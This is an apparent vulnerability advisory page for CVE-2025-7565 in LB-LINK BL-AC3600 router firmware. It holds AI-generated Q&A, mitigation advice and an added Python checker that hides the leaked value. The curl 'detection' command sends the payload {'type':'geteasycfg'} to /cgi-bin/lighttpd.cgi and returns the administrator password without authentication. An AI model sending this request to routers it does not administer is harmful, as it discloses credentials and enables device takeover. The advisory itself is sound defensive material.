CVE-2025-7565
BaseFortify
Publication date: 2025-07-14
Last updated on: 2025-07-17
Assigner: VulDB
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| lb-link | bl-ac3600_firmware | up to 1.0.22 (inclusive) |
| lb-link | bl-ac3600 | * |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
| CWE-200 | The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
| CWE-522 | The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-7565 is a critical information disclosure vulnerability in the LB-LINK BL-AC3600 router firmware up to version 1.0.22. It exists in the web management interface, specifically in the geteasycfg function of the /cgi-bin/lighttpd.cgi endpoint. By sending a crafted HTTP request with a specific JSON payload, an attacker can retrieve the administrator password in plaintext without any authentication. This allows the attacker to gain full control over the router remotely. [1, 2]
How can this vulnerability impact me?
This vulnerability can lead to unauthorized disclosure of the router's administrator password, allowing an attacker to gain full control over the device remotely. With control over the router, the attacker can manipulate network traffic, intercept sensitive data, disrupt network services, or use the device as a foothold for further attacks within the network. [1, 2]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
This vulnerability exposes sensitive information (administrator password) to unauthorized actors, which can lead to unauthorized access and potential data breaches. Such incidents can violate data protection requirements under standards like GDPR and HIPAA, which mandate safeguarding sensitive information and ensuring confidentiality. Therefore, exploitation of this vulnerability could result in non-compliance with these regulations. [2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by sending an HTTP request to the router's `/cgi-bin/lighttpd.cgi` endpoint with the JSON payload `{"type":"geteasycfg"}`. If the device responds with the administrator password in plaintext within the password field, it is vulnerable. A simple detection command using curl would be:

```sh
curl -X POST http://<router-ip>/cgi-bin/lighttpd.cgi -d '{"type":"geteasycfg"}' -H 'Content-Type: application/json'
```

Then check the response for the password field. [1, 2]
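A defender-side version of that check, added here and not part of the BaseFortify record or of LB-LINK's firmware: it sends the documented request to a router you administer and reports only whether a non-empty password field came back on an unauthenticated request, never the value itself. It assumes the reply is JSON and that the leaked value sits under a key named `password` (the record says only "the password field"); the rest of the response layout is unknown, so the search is recursive.

```python
import json
import urllib.error
import urllib.request

ENDPOINT_PATH = "/cgi-bin/lighttpd.cgi"   # endpoint named in the record
PROBE_PAYLOAD = {"type": "geteasycfg"}    # payload named in the record


def _find_key(obj, wanted):
    """Yield every value stored under key `wanted` anywhere in a JSON object."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            if key.lower() == wanted:
                yield value
            yield from _find_key(value, wanted)
    elif isinstance(obj, list):
        for item in obj:
            yield from _find_key(item, wanted)


def classify_response(status, body):
    """Return 'vulnerable', 'not_vulnerable' or 'inconclusive' without ever
    returning the secret; the key name "password" is an assumption."""
    if status in (401, 403):
        return "not_vulnerable"   # the interface demanded authentication
    try:
        data = json.loads(body)
    except ValueError:
        return "inconclusive"     # HTML error page, empty body, etc.
    leaked = [v for v in _find_key(data, "password") if isinstance(v, str) and v]
    return "vulnerable" if leaked else "not_vulnerable"


def probe(router_ip, timeout=5):
    """Send the documented request to a router you administer and classify it."""
    req = urllib.request.Request(
        f"http://{router_ip}{ENDPOINT_PATH}",
        data=json.dumps(PROBE_PAYLOAD).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_response(resp.status, resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as err:   # 4xx/5xx arrive as exceptions
        return classify_response(err.code, err.read().decode(errors="replace"))
```

Connection failures (`urllib.error.URLError`) propagate unchanged so an unreachable device is not mistaken for a patched one.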
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include implementing restrictive firewall rules to block unauthorized remote access to the vulnerable /cgi-bin/lighttpd.cgi interface on the LB-LINK BL-AC3600 router. Since the vendor has not provided a patch or response, preventing external access to the web management interface is critical to reduce risk. [2]